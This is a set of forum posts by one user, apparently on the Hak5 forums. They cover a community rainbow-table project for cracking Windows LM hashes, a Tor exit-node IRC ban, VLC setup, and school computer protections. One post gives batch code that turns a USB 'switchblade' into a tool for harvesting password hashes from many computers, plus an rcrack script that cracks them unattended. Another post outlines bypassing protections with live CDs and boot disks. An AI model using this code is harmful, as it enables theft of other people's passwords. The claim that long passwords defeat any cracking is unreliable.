silivrenion

This topic has been added to the CRT meeting agenda. http://www.hak5.org/wiki/Community_Rainbow.../Meeting_Agenda

That's correct, windows will default to NTLM if the pass is longer than 14 characters. Personally, my high security passwords are 16 characters or greater, defeating any chance of cracking.

The Community Rainbow Tables project has been thinking about what the next technology will be, however no final plans have been set for the next one. The majority of people voted MD5, but we'll have a meeting coming up soon to allow people to voice their opinions. If you want to integrate the NTLM tables with the Community Rainbow Tables project, please contact me in the RainbowTables channel, irc.hak5.org #RainbowTables and we can discuss what set you've begun to generate, and whether it'll make sense to continue it via the community. Also, keep an eye on rtables.blogspot.com, specifically the RSS feed of the page.. news for the Community Rainbow Tables project is submitted there. If you have any questions, again, feel free to ask in the IRC channel Kudos on the ideas, Silivrenion

There's a section of the wiki now devoted to the mail in program. The new program's name is RainbowTables by Mail... http://hak5.org/w/index.php?title=Communit...wTables_by_mail

its uncompressed because if it was compressed, the end user would need (compressedspace) + (uncompressedspace) file space in order to use it, and 120GB's is enough

The RainbowTables project has finished generating the 120GB LM All set, and they are now available for public download via torrent at: http://silivrenion.com/rainbowtables/hak5_...all_1-7.torrent There is also a CrackBot available in the IRC channel at irc.hak5.org #RainbowTables that can crack your passwords live. Be patient with the bot, it takes a while to search for your hash! If you wish to grab a copy of the Rainbow Tables, you must have 120GB free for the entire set. You can always grab less if you really want, but your success rate will be less. :P We'll start the MD5 soon. :D

I'm a conformist.. I use mIRC :P

MD5 seems to win.. we now need to compile information about the MD5 tables, generating with them, and what table profiles and hardware space are required.

heh, sorry about that, I was kind of hoping other people had more information than me about the actual technologies... Basically, google searching gives some good insight into the different technologies and what they do from a usage standpoint. Cisco PIX tables would contribute to Cisco PIX firewall password cracking. Information about MD2,4,5 are available via RSA Security :: http://www.rsasecurity.com/rsalabs/node.asp?id=2253 Practical applications for MD encryption I'm at a lack of information about. The usage of MySQL SHA1 encryption is defined in the MySQL 5.0 Ref Manual at http://dev.mysql.com/doc/refman/5.0/en/enc...l#function_sha1 There's an excellent NTLM article at wikipedia at http://en.wikipedia.org/wiki/NTLM RIPEMD-160 is also explained in wikipedia at http://en.wikipedia.org/wiki/RIPEMD-160 Last, but not least SHA1 information can be found at http://en.wikipedia.org/wiki/SHA1 and http://www.w3.org/PICS/DSig/SHA1_1_0.html

For those of you who are unfamiliar with the Community Rainbow Tables project, you can check us out at http://www.hak5.org/wiki/index.php?title=C..._Rainbow_Tables For everyone else, we have successfully filled the active rainbow tables list with generating tables!!! That means, there's no more unassigned tables left!!! ::pause for cheering/beer/etc.:: Alright. The battle's half over with LM Hashes. We need to finish up generating the tables and create a torrent distribution of it. The next question is what are we going to do now? Now that there's no unassigned sections, we need to start thinking about the next direction we will start building in. Our choices for upcoming tables consist of Cisco PIX, MD2, MD4, MD5, MySQL SHA1, MySQL v.3.23, NT LanMan, RIPEMD-160, and SHA1. We need to compare and contrast the hardware, time, disk space, bandwidth requirements, distributability, and mathematical preferences behind these choices to make sure we pick a next table group that will be an important significance to the community. Please discuss the pros and cons, and feasability of these technologies, so that we can choose which will be the next in line.

I officially released the schematic and information about the project to Hak5. It's in the Dev forums, for those of you that have access!!

haha, the screen has pretty colors.. :D unfortunately, I dont know how to help with recovering the data off the phone.. :( People loose data, I guess... just a fact of life.

Definitely a worthwhile project!! :D

Please pick which solution you vote for, and the solution with the highest rating will become the policy. Basically in #RainbowTables we've been talking about ways to handle FTP access to allow people to submit their files. There's two current solutions. 1. One single anonymous login, disable delete/overwrite/rename/mkdir. Users can only upload files. The downside to this is that if an upload fails, the fragment on the server must be deleted manually before that person's upload will work again. 2. Individual logins for contributors, each contributor has full rights to their own directory. Users will be able to resume their uploads if they wish, however this is a lot of trouble to maintain username/password combinations for all of the contributors to the project.

A small modification can be made that will allow someone to easily create a file of lm password hashes alongside the usual machine output. The benefit? Well, lets say someone wanted to go to several computers, and wanted to grab a long list of passwords to crack in one fell swoop. Copying and pasting from all of the individual log files would be tedious to create an lm hash list, so why not create it on the fly? edit your switchblade batch file so that at the bottom, you see this. Also, note that your switchblade file might not have the URL history, depending on the version you chose. Pay attention to the line that starts with TYPE. ... [continued from file] ... Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 echo ***********[Dump URL History]******* >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 cscript //nologo .DUH.vbs >> Documentslogfiles%computername%.log 2>&1 TYPE Documentslogfiles%computername%.log | find ":::" | find /V "NO PASSWORD" | find /V "HelpAssistant" >> Documentslogfilespwfile.txt :End exit Pay special attention to the line that starts with TYPE. Lets go through it one by one. TYPE Documentslogfiles%computername%.log This will get the output we just created with switchblade, so we can work with it. find ":::" I noticed all of the lm hashes had three colons in their lines, which appeared no where else. Might aswell use that to our advantage! find /V "NO PASSWORD" | find /V "HelpAssistant" There's two types of lines that we don't want to see, ones that have no password to crack, and those that are of the Microsoft created account "HelpAssistant". If there's other search terms you don't want to see, you can add them also. >> Documentslogfilespwfile.txt This will create a password file if it doesnt exist. If it does exist, the password file will be appended to, so that you can rapidly gather passwords into one file for quick cracking.... which can be done with the next small code edit Making rcrack one-click friendly use notepad to create the following file, and save it as crack.bat or something with a batch extension. This will be saved on your cracking computer at home that contains your rainbow tables. Hopefully you don't bring those with you on your USB key!!! :o @echo off echo Starting crack, writing output to log.txt ... echo >> log.txt echo ************************************ >> log.txt echo Cracking started by %username% at %date% %time% >> log.txt rcrack.exe *.rt -f pwfile.txt >> log.txt echo Cracking complete at %date% %time% >> log.txt echo ************************************ >> log.txt echo Success! this batch file will process your password file you created, and output the status of it to log.txt in your cracking folder. This way you can leave your computer cracking unattended, and still be able to get the results later in an organized manner, with all of your passwords you gathered in one neat and convenient location.

I know its kind of a strange way to do it, but there's a program called "ajoo blast" that will let you setup a streaming music server, and you can connect to it with a second copy of the client. It's kinda limited in that its only ajoo to ajoo communication, but its a good thing if you just want to play music privately for yourself. :) otherwise, shoutcast and winamp will let you setup an official streaming audio content thats compatible with everyone else.

yeah, its slightly strange that we're introduced to tor in Hak5 Episode 10, yet IRC has it banned. :S

tor.eff.org :: wiki.noreply.org :: http://wiki.noreply.org/noreply/TheOnionRo...AQ#DefaultPorts ::

I personally use the default exit policies on my exit node, but if there's abuse I hear about on freenode #tor, I remove those ports.

Where would the money go? Supporting EFF and Tor, or somewhere else? Monopolizing on an open source product seems wrong on so many levels... -.-

I run as an exit node for the Tor network, because I support anonymous internet practices, and the freedom of the people behind the Great Firewall of China and other restrictive locations. However, I woke up this morning to find my IRC log gives a gloomy message :: * Connect retry #1 208.98.24.4 (6667) - -vertex.hak5.org- *** Looking up your hostname... - -vertex.hak5.org- *** Found your hostname (cached) - -vertex.hak5.org- *** Checking ident... - -vertex.hak5.org- *** No ident response; username prefixed with ~ - -vertex.hak5.org- *** If you are having problems connecting due to ping timeouts, please type /quote pong AAA82881 or /raw pong AAA82881 now. - -vertex.hak5.org- *** You are banned from Hak5IRC (Your IP, 24.147.xxx.xx, is in our TOR Server List.. http://www.sectoor.de/tor.php?ip=24.147.xxx.xx) - Closing Link: Silivrenion[c-24-147-xxx-xx.hsd1.ma.comcast.net] (User has been banned from Hak5IRC (Your IP, 24.147.xxx.xx, is in our TOR Server List.. http://www.sectoor.de/tor.php?ip=24.147.xxx.xx)) - * Disconnected As a supporter of anonymous internet, and despite the fact that I promised owine I would not connect through the Tor network to irc.hak5.org, I was banned simply because of a service I run on my network. Understandably, all services are susceptible to attack, and some server admins can ban those services at least temporarily until the attacks subside, but blocking all nodes hampers the reach of the entire Tor internet project. With internet neutrality rights being questioned today, Tor may be a white flag of hope in the distance for many people. I don't mean to sound like a politician or anything, I just want to be able to support the projects I believe in, while being able to connect to hak5 IRC. Freenode resolved a lot of these issues by implementing a whitelist of Tor users which are known to be 1. credible and trustworthy, 2. representative of the online Tor population, 3. under control of their exit node's traffic and bandwidth policies. Maybe this is a solution applicable here? Authentication wise, I am not interested in anonymity myself to the Hak5 network. I only care about the anonymity of others, so I contribute my bandwidth. Is this a reason to ban me, when I carefully maintain my bandwidth and flood controls and try my best to provide a suitable service for everyone? If there's any authentication that can be done to verify my actual identity on the server, I'd do it. Heck, I'd call the phone or write snail mail if it meant the ability to talk on Hak5. Owine mentioned on the IRC of an SSL connection to the IRC, but I wasn't able to make a connection to it. Is this my hope for connection? Please allow me to support my projects which I believe in while being able to communicate on my favorite channel. Please whitelist my IP and other trusted Tor exit nodes, or remove the sectoor DNSBL ban, or provide a way for people who serve as exit nodes, but aren't connected through the Tor network to be able to use irc.hak5.org. I've been a fan of Hak5 up to this point, please don't give me a reason to change that now.

Ok, now the question of truth. Many old devices couldn't support HTML directly, and used a .wml standard instead. Is VLC compatible with this standard, so I can use my older devices?

actually, i found in directx settings a place to select the display to fullscreen on (Video/DirectX). Also, I found Democracy Player doesn't auto play files :D

So i've had enough problems getting an OS to support the TV Out of my graphics card. I finally got Windows XP to work, and downloaded VLC; except I found that the inline settings "start c:vlcvlc.exe h:media --intf=http --fullscreen" causes VLC to open in the primary monitor, NOT monitor 3, where the TV is connected. I'd like to be able to rely on the script for the entire process, but I can't find a way to get VLC to open on that monitor. I tried opening VLC and setting it on that monitor and quitting, but when it reopened, it opened on the primary monitor again! A secondary problem I'm having is finding a decent podcast downloader... FireAnt.tv seems to like autoplaying things once they are downloaded, and has no configuration options for these settings, so i'm looking for a new downloader. Any help would be appreciated!

I'm sure the person is quite aware of the morals behind doing what he/she is doing at this point. If you insist on doing this, the best method to get DATA off a drive would be through a CD live distro, like knoppix. You can either put the data on the local/public network, or onto a flash drive. If you are interested in screwing around with the integrity of the computer's functions.. might aswell just treat it like crap anyway, but there's a reason why that's secure; also since its really immature to make mspaint backgrounds containing cuss words and other tagged-like pictures. With DOS oriented systems, most protection classes can be overridden with a cleverly constructed boot disk. Simply boot the system off a command.com and configuration files contained on a customized boot disk, and in most cases sub-windows level protection programs won't boot; However stupid protection programs will boot (the ones that are told to boot as part of settings in the registry's Startup area). Either way, if its protected, its meant to not be touched with. If you really want to play around, why don't you sign up for an internship or something to learn how these things work, with the amnesty of the school to be able to do whatever you want legally with permission.